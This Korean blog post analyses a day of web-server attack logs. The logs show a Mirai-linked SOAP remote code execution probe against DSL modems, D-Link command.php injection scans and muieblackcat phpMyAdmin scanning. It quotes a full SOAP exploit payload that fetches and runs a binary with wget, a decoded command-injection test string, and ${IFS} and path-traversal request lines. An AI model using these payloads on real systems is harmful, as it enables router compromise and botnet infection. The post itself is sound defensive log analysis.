오늘의 웹서버 공격 로그, SOAP 원격코드실행, D-Link 명령어 삽입, muieblackcat

홈페이지 취약점 분석 이야기	파일 지도 사진 깨알

>> 목록보이기
#공격로그 #스캔로그 #POST /UD/act? #POST /command.php #muieblackcat

오늘의 웹서버 공격로그 (2016년 12월 4일)

DSL 라우터(모뎀) 취약점 탐색(POST /UD/act?1), D-Link 무선공유기 취약점 탐색(POST /command.php), Muieblackcat 스크립트봇이 수행하는 PhpMyAdmin 탐색 등의 접속로그가 관찰되었다.

SOAP Remote Code Execution Attack

37.139.59.69 - - [04/Dec/2016:16:32:52 +0900] "POST /UD/act?1 HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
37.139.59.69 - - [05/Dec/2016:01:58:42 +0900] "POST /UD/act?1 HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

접속자 IP주소: 37.139.59.69 (러시아 상트페테르부르크/Sankt-Peterburg)
이 공격은 Zyxel AMG1202-T10B with V2.00 (AAFN.7) firmware의 취약점을 공략할 수 있다고 한다. 아일랜드 통신사인 Eir의 D1000 모뎀이 이 공격에 취약하다고 한다. 현재 미라이봇넷에서 이 취약점을 활용하고 있다고 한다. 서버의 응답은 404.

다음은 6일전에 해커뉴스(Hacker News)에 게재된 공격 payload이다.

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

- 출처: https://news.ycombinator.com/item?id=13055402

SOAP 요청을 보면 "`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`"를 실행하도록 요청한다. 이 바이러리는 미라이 악성코드라고 한다. 보다 자세한 내용은 다음 자료들을 참고하시길...

SOAP Remote Code Execution Attack 관련 참고자료

Port 7547 SOAP Remote Code Execution Attack Against DSL Modems, 2016-11-29
Eir’s D1000 Modem Is Wide Open To Being Hacked., 2016-11-07, PoC
New Mirai attack vector – bot exploits a recently discovered router vulnerability, 2016-11-28

D-Link 무선공유기 취약점 탐색

201.52.253.227 - - [04/Dec/2016:17:35:55 +0900] "GET /cgi/common.cgi HTTP/1.0" 404 439 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:35:56 +0900] "GET /stssys.htm HTTP/1.0" 404 435 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:35:58 +0900] "POST /command.php HTTP/1.0" 404 436 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:35:59 +0900] "GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0" 404 509 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:35:59 +0900] "GET /../../../../../../../mnt/mtd/qt HTTP/1.0" 400 455 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:36:00 +0900] "GET /cgi/common.cgi HTTP/1.0" 404 439 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:36:01 +0900] "GET /stssys.htm HTTP/1.0" 404 435 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:36:03 +0900] "POST /command.php HTTP/1.0" 404 436 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:36:04 +0900] "GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0" 404 509 "-" "Wget(linux)"
201.52.253.227 - - [04/Dec/2016:17:36:05 +0900] "GET /../../../../../../../mnt/mtd/qt HTTP/1.0" 400 455 "-" "Wget(linux)"

접속자 IP주소: 201.52.253.227 (브라질 상파울로)
2013년 무렵부터 발견되는 공격이라고 한다. D-Link® Wireless Router의 관리자 웹페이지에 OS 명령어 삽입 취약점이 있다고 한다.

참고자료

command.php wget HTTP Post, 2016-08-09

위의 참고자료를 보면 실제 공격은 다음과 같다고 한다.

POST /command.php HTTP/1.0
User-Agent: Wget(linux)

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST로 전달되는 cmd 변수의 내용은 "cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt"이다. 실제 공격은 아니고 취약점 유무를 탐지하는 것이라고 한다. 서버의 응답이 200이고 "610cker"이라는 문자열이 포함되어 있으면 취약점이 존재하는 것이다.

Muieblackcat 스크립트봇

89.248.169.50 - - [04/Dec/2016:20:35:17 +0900] "GET /muieblackcat HTTP/1.1" 404 437 "-" "-"
89.248.169.50 - - [04/Dec/2016:20:35:17 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 453 "-" "-"
89.248.169.50 - - [04/Dec/2016:20:35:18 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 453 "-" "-"
89.248.169.50 - - [04/Dec/2016:20:35:18 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 453 "-" "-"
89.248.169.50 - - [04/Dec/2016:20:35:19 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 446 "-" "-"

접속자 IP주소: 89.248.169.50 (세이셸 공화국 / 아프리카)
2011년부터 발견되는 스캐너 접속결과라고 한다. 우크라이나에서 개발된 것으로 보이는 muieblackcat 스크립트봇(script/bot)으로 PHP 취약점을 탐색한다. 타 사이트의 경우와 함께 위의 결과를 살펴보면 PhpMyAdmin 경로를 탐색하는 것을 볼 수 있다. 서버 응답은 모두 404. 다음은 참고할 만한 사이트들이다.

SUC027: Muieblackcat setup.php Web Scanner/Robot, 2011.08.14
방금 뭔가가 내 컴퓨터를 훑고 지나갔다 (muieblackcat), 2012.02.10

[처음 작성한 날: 2016.12.05] [마지막으로 고친 날: 2016.12.05]

< 이전 글 : 미라이 IoT DDoS 봇넷이 사용한 61개 비밀번호 (2016.12.05)

> 다음 글 : 오늘의 웹서버 공격 로그, w00tw00t (DFind) (2016.12.04)

이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문